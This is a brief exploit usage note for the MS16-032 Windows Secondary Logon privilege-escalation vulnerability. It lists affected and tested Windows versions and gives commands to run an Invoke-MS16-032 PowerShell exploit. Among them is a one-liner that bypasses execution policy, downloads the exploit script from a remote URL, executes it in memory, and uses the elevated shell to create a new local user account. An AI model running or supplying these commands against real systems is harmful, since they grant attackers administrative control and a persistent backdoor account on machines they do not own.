The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."
| Product | CPU Architecture | Version | Update | Tested |
|---|---|---|---|---|
| Windows 10 | ||||
| Windows 10 | 1511 | |||
| Windows 7 | SP1 | ✔ | ||
| Windows 8.1 | ||||
| Windows Rt 8.1 | ||||
| Windows Server 2008 | SP2 | ✔ | ||
| Windows Server 2008 | R2 | SP1 | ✔ | |
| Windows Server 2012 | ||||
| Windows Server 2012 | R2 | |||
| Windows Vista | SP2 |
Target system requires more than 2 CPU cores
PS script test, perform the following command in Windows Server 2008 R2 SP1 X64
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
Can also add an account remotely
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user ascotbe test6666 /add'"
GIF map is as follows
Test all the versions of X64 and X86 using the EXE file, which only records Windows 7 SP1 X64 version
